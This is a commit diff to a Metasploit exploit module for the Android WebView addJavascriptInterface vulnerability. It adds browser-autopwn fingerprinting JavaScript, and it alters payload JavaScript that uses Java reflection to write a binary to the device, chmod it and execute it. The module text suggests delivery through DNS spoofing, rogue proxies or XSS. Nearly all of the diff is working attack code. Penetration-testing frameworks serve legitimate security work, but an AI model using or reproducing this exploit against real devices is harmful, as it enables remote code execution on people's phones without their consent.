Add browserautopwn support.

modules/exploits/android/browser/webview_addjavascriptinterface.rb

@@ -8,6 +8,22 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserAutopwn
+
+  autopwn_info({
+    :os_flavor  => "Android",
+    :arch       => ARCH_ARMLE,
+    :javascript => true,
+    :rank       => ExcellentRanking,
+    :vuln_test  => %Q|
+      for (i in top) {
+        try {
+          top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
+          is_vuln = true; break;
+        } catch(e) {}
+      }
+    |
+  })
 
   def initialize(info = {})
     super(update_info(info,
@@ -17,13 +33,13 @@ class Metasploit3 < Msf::Exploit::Remote
           arbitrary code on vulnerable Android devices. The issue is rooted in
           the use of the addJavascriptInterface function, which exposes Java
           Reflection to Javascript executing within a WebView instance. Many
-          Android ad networks are known to be affected.
+          Android ad network integrations are known to be affected.
 
           To use this module, the attacker must have some way to inject the html/js
           served by metasploit into an affected Webview on the target device. There
           are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).
 
-          This module can also get a shell on some versions of the Android Browser for
+          This module can also get a shell on some versions of the Browser app on
           Android < 4.2, where the vendor has added an addJavascriptInterface wrapper.
 
           Note: Adding a .js to the URL will return plain javascript (no HTML markup).
@@ -60,9 +76,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def js
     %Q|
-      function exec(obj,i) {
+      function exec(obj) {
         // ensure that the object contains a native interface
-        try { obj.getClass().getName(); } catch(e) { return false; }
+        try { obj.getClass().getName(); } catch(e) { return; }
 
         // get the runtime so we can exec
         var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
@@ -77,12 +93,12 @@ class Metasploit3 < Msf::Exploit::Remote
         // build the binary, chmod it, and execute it
         m.invoke(null,null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
         m.invoke(null,null).exec(['chmod', '700', path]).waitFor();
-        m.invoke(null,null).exec([path]).waitFor();
+        m.invoke(null,null).exec([path]);
 
         return true;
       }
 
-      for (i in window) { if (exec(window[i],i) === true) break; }
+      for (i in top) { if (exec(top[i]) === true) break; }
     |
   end